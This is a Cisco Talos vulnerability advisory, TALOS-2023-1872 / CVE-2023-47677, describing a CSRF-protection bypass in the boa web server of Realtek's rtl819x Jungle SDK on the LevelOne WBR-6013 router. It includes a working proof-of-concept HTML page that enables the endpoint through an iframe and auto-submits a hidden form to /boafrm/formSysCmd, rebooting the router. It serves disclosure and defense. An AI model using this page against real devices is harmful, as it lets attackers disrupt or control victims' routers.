Talos Vulnerability Report

TALOS-2023-1872

Realtek rtl819x Jungle SDK boa CSRF protection cross-site request forgery (CSRF) vulnerability

July 8, 2024

CVE Number

CVE-2023-47677

SUMMARY

A cross-site request forgery (csrf) vulnerability exists in the boa CSRF protection functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted network request can lead to CSRF. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11

PRODUCT URLS

rtl819x Jungle SDK - https://www.realtek.com/en/ WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

DETAILS

The rtl819x Jungle SDK is an SDK for routers. This SDK uses as web server boa.

This Realtek rtl819x Jungle SDK vulnerability was found while researching the Levelone WBR-6013 router. We are going to explain this vulnerability from the perspective of the WBR-6013 router.

The WBR-6013 router has a web server called boa. This web server has a CSRF mechanism that will not allow any API call until an HTML page that contains a form with that endpoint API is loaded.

This mechanism does not actually prevent CSRF. Indeed, exploitation of a vulnerability can first perform a CSRF bypass attack to the HTML page that will enable the desired API, as well as perform the actual attack against the desired API.

<html>
    <body>
        <form id='csrf' action="http://<DEVICE_IP>/boafrm/formSysCmd" method="POST">
            <input type="hidden" name="sysCmd" value="reboot" />
        </form>
        <iframe
            src="http://<DEVICE_IP>/syscmd.htm">
        </iframe>
        <script>
            setTimeout(() => document.getElementById("csrf").submit(), 2000)
        </script>
    </body>
</html>

Via the majority of browsers, visiting the HTML page above would result in the browser including the Authorization header. This will result in the victim first loading the syscmd.htm HTML page, which will enable the /boafrm/formSysCmd. After 2 seconds the victim will be redirected to execute the /boafrm/formSysCmd API, resulting in a router reboot.

VENDOR RESPONSE

Realtek has provided updates software to their customers. LevelOne has declined to patch the issues in their software.

TIMELINE

2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.

TALOS-2023-1877

TALOS-2023-1873

Intelligence Center

Vulnerability Research

Security Resources

Media

Company